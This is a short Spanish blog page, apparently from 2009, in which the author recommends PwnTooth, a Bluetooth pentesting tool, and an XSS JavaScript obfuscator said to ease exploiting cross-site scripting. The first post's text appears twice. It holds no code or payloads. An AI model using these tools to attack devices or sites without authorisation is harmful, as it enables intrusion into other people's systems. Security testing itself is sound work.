Lo que hace básicamente es automatizarte una busqueda de errores del dispositivo que analiza, tu puedes elejir las tools con las que analiza, tiene un repositorio de extención normal que podría mejorar, tu solo tienes que poner la configuración de la herramienta para que los resultados sean los deseados...


La versión mas actualizada 0.2.2 cuenta con un rápido escaneo, facil configuración por medio del archivo pwntooth.conf en el directorio /etc/bluetooth/ esta herramienta no es muy difícil de usar como repito y la recomiendo en un 100%


En Este Link puedes encontrar las versiones mas antiguas y actuales de esta herramienta...

Pagina Oficial:

Click Aquí


Saludos
Dr.White

PwnTooth - Pentesting Bluetooth


Eexcelente Herramienta para hacerle pen-test a un dispositivos bluetooth, hoy lo he probado y funciona de maravilla =)

Lo que hace básicamente es automatizarte una busqueda de errores del dispositivo que analiza, tu puedes elejir las tools con las que analiza, tiene un repositorio de extención normal que podría mejorar, tu solo tienes que poner la configuración de la herramienta para que los resultados sean los deseados...


La versión mas actualizada 0.2.2 cuenta con un rápido escaneo, facil configuración por medio del archivo pwntooth.conf en el directorio /etc/bluetooth/ esta herramienta no es muy difícil de usar como repito y la recomiendo en un 100%


En Este Link puedes encontrar las versiones mas antiguas y actuales de esta herramienta...

Pagina Oficial:

Click Aquí


Saludos
Dr.White

domingo, 4 de octubre de 2009

Xss Javascript Obfuscator

Muy Buena Tool, hoy la he estado probando y pues no es las mil maravillas pero te facilita la ejecución y explotación de xss por medio de javascript y ofuscasión de la url, es muy útil la verdad, espero les agrade la tool, por cierto tiene multiples funcionabilidades, te deja hacer document.write, te deja elegir el tipo de encriptación y muchas features mas.


Link de descarga:

Click Aquí

Espero les guste esta tool =)


Saludos
Dr.White